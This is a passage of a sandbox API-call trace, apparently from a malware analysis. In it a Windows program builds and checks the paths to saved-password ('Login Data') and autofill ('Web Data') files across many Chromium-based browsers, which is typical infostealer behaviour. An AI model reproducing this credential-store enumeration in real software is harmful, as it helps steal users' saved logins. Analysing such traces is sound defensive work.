(lpLibFileName="shlwapi") returned 0x77680000 [0126.426] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 0 [0126.427] GetProcessHeap () returned 0x6a0000 [0126.427] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6aae38 | out: hHeap=0x6a0000) returned 1 [0126.427] GetProcessHeap () returned 0x6a0000 [0126.427] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.428] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.429] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Login Data") returned 61 [0126.429] GetProcessHeap () returned 0x6a0000 [0126.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7e) returned 0x6b5990 [0126.429] GetProcessHeap () returned 0x6a0000 [0126.429] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.431] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Login Data") returned 0 [0126.431] GetProcessHeap () returned 0x6a0000 [0126.432] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.432] GetProcessHeap () returned 0x6a0000 [0126.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.433] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.434] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 69 [0126.434] GetProcessHeap () returned 0x6a0000 [0126.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x6b5990 [0126.435] GetProcessHeap () returned 0x6a0000 [0126.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.436] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.436] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 0 [0126.436] GetProcessHeap () returned 0x6a0000 [0126.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.437] GetProcessHeap () returned 0x6a0000 [0126.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.437] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.438] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 83 [0126.438] GetProcessHeap () returned 0x6a0000 [0126.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xaa) returned 0x6b5990 [0126.438] GetProcessHeap () returned 0x6a0000 [0126.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.439] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.439] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 0 [0126.440] GetProcessHeap () returned 0x6a0000 [0126.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.440] GetProcessHeap () returned 0x6a0000 [0126.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.441] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.442] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 81 [0126.442] GetProcessHeap () returned 0x6a0000 [0126.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x6b5990 [0126.442] GetProcessHeap () returned 0x6a0000 [0126.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.443] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 0 [0126.443] GetProcessHeap () returned 0x6a0000 [0126.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.444] GetProcessHeap () returned 0x6a0000 [0126.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.445] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.445] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Login Data") returned 64 [0126.446] GetProcessHeap () returned 0x6a0000 [0126.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x84) returned 0x6b5990 [0126.446] GetProcessHeap () returned 0x6a0000 [0126.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.447] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Login Data") returned 0 [0126.447] GetProcessHeap () returned 0x6a0000 [0126.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.448] GetProcessHeap () returned 0x6a0000 [0126.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.449] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.451] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 72 [0126.451] GetProcessHeap () returned 0x6a0000 [0126.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x94) returned 0x6b5990 [0126.451] GetProcessHeap () returned 0x6a0000 [0126.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.453] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 0 [0126.454] GetProcessHeap () returned 0x6a0000 [0126.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.454] GetProcessHeap () returned 0x6a0000 [0126.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.455] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.456] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 85 [0126.456] GetProcessHeap () returned 0x6a0000 [0126.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xae) returned 0x6b5990 [0126.456] GetProcessHeap () returned 0x6a0000 [0126.456] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.458] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 0 [0126.458] GetProcessHeap () returned 0x6a0000 [0126.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.459] GetProcessHeap () returned 0x6a0000 [0126.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.465] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.466] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 83 [0126.466] GetProcessHeap () returned 0x6a0000 [0126.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xaa) returned 0x6b5990 [0126.466] GetProcessHeap () returned 0x6a0000 [0126.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.467] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 0 [0126.467] GetProcessHeap () returned 0x6a0000 [0126.468] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.468] GetProcessHeap () returned 0x6a0000 [0126.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.469] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.470] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 66 [0126.470] GetProcessHeap () returned 0x6a0000 [0126.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x88) returned 0x6b5990 [0126.470] GetProcessHeap () returned 0x6a0000 [0126.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.471] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.472] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 0 [0126.472] GetProcessHeap () returned 0x6a0000 [0126.472] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.472] GetProcessHeap () returned 0x6a0000 [0126.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.473] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.474] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 74 [0126.474] GetProcessHeap () returned 0x6a0000 [0126.474] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x98) returned 0x6b5990 [0126.474] GetProcessHeap () returned 0x6a0000 [0126.475] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.476] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.476] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 0 [0126.476] GetProcessHeap () returned 0x6a0000 [0126.477] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.477] GetProcessHeap () returned 0x6a0000 [0126.477] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.478] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.479] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 82 [0126.479] GetProcessHeap () returned 0x6a0000 [0126.479] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa8) returned 0x6b5990 [0126.479] GetProcessHeap () returned 0x6a0000 [0126.479] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.480] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 0 [0126.481] GetProcessHeap () returned 0x6a0000 [0126.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.481] GetProcessHeap () returned 0x6a0000 [0126.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.482] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.483] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 80 [0126.483] GetProcessHeap () returned 0x6a0000 [0126.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa4) returned 0x6b5990 [0126.483] GetProcessHeap () returned 0x6a0000 [0126.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.484] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 0 [0126.485] GetProcessHeap () returned 0x6a0000 [0126.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.485] GetProcessHeap () returned 0x6a0000 [0126.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.485] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.486] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 63 [0126.486] GetProcessHeap () returned 0x6a0000 [0126.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6b5990 [0126.486] GetProcessHeap () returned 0x6a0000 [0126.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.488] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 0 [0126.488] GetProcessHeap () returned 0x6a0000 [0126.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.488] GetProcessHeap () returned 0x6a0000 [0126.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.489] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.490] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 71 [0126.490] GetProcessHeap () returned 0x6a0000 [0126.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x92) returned 0x6b5990 [0126.490] GetProcessHeap () returned 0x6a0000 [0126.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.492] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 0 [0126.492] GetProcessHeap () returned 0x6a0000 [0126.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.492] GetProcessHeap () returned 0x6a0000 [0126.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.493] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.494] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 72 [0126.494] GetProcessHeap () returned 0x6a0000 [0126.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x94) returned 0x6b5990 [0126.494] GetProcessHeap () returned 0x6a0000 [0126.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.495] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 0 [0126.496] GetProcessHeap () returned 0x6a0000 [0126.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.496] GetProcessHeap () returned 0x6a0000 [0126.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.497] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.497] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 70 [0126.497] GetProcessHeap () returned 0x6a0000 [0126.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x6b5990 [0126.498] GetProcessHeap () returned 0x6a0000 [0126.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.499] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 0 [0126.499] GetProcessHeap () returned 0x6a0000 [0126.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.502] GetProcessHeap () returned 0x6a0000 [0126.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.510] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.511] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Login Data") returned 53 [0126.511] GetProcessHeap () returned 0x6a0000 [0126.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6e) returned 0x6b5990 [0126.511] GetProcessHeap () returned 0x6a0000 [0126.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.513] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Login Data") returned 0 [0126.513] GetProcessHeap () returned 0x6a0000 [0126.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.513] GetProcessHeap () returned 0x6a0000 [0126.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.514] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.515] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Default\\Login Data") returned 61 [0126.515] GetProcessHeap () returned 0x6a0000 [0126.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7e) returned 0x6b5990 [0126.515] GetProcessHeap () returned 0x6a0000 [0126.516] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.517] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.517] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Default\\Login Data") returned 0 [0126.517] GetProcessHeap () returned 0x6a0000 [0126.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.518] GetProcessHeap () returned 0x6a0000 [0126.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.519] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.519] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 72 [0126.519] GetProcessHeap () returned 0x6a0000 [0126.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x94) returned 0x6b5990 [0126.519] GetProcessHeap () returned 0x6a0000 [0126.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.556] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 0 [0126.556] GetProcessHeap () returned 0x6a0000 [0126.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.557] GetProcessHeap () returned 0x6a0000 [0126.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 [0126.558] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.559] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 70 [0126.559] GetProcessHeap () returned 0x6a0000 [0126.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x6b5990 [0126.559] GetProcessHeap () returned 0x6a0000 [0126.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.560] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.561] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 0 [0126.561] GetProcessHeap () returned 0x6a0000 [0126.561] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.561] GetProcessHeap () returned 0x6a0000 [0126.561] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f5e) returned 0x6b8f80 [0126.562] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.563] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Login Data") returned 53 [0126.563] GetProcessHeap () returned 0x6a0000 [0126.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6e) returned 0x6b5990 [0126.564] GetProcessHeap () returned 0x6a0000 [0126.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.571] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Login Data") returned 0 [0126.571] GetProcessHeap () returned 0x6a0000 [0126.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.572] GetProcessHeap () returned 0x6a0000 [0126.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f6e) returned 0x6b8f80 [0126.573] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.574] wvsprintfW (in: param_1=0x6b8f80, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Default\\Login Data") returned 61 [0126.574] GetProcessHeap () returned 0x6a0000 [0126.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7e) returned 0x6b5990 [0126.574] GetProcessHeap () returned 0x6a0000 [0126.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.576] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Default\\Login Data") returned 0 [0126.576] GetProcessHeap () returned 0x6a0000 [0126.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5990 | out: hHeap=0x6a0000) returned 1 [0126.577] GetProcessHeap () returned 0x6a0000 [0126.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8d70 | out: hHeap=0x6a0000) returned 1 [0126.577] GetProcessHeap () returned 0x6a0000 [0126.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x208) returned 0x6b8d70 [0126.578] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0126.578] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6b8d70 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0126.579] GetProcessHeap () returned 0x6a0000 [0126.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f84) returned 0x6b8f80 [0126.580] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0126.581] wvsprintfW (in: param_1=0x6b8f80, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 89 [0126.581] GetProcessHeap () returned 0x6a0000 [0126.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb6) returned 0x6bcf10 [0126.581] GetProcessHeap () returned 0x6a0000 [0126.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b8f80 | out: hHeap=0x6a0000) returned 1 [0126.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0126.582] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Opera\\Opera Next\\data\\User Data\\Default\\Login Data") returned 0 [0126.583] GetProcessHeap () returned 0x6a0000 [0126.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bcf10 | out: hHeap=0x6a0000) returned 1 [0126.583] GetProcessHeap () returned 0x6a0000 [0126.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3f80) returned 0x6b8f80 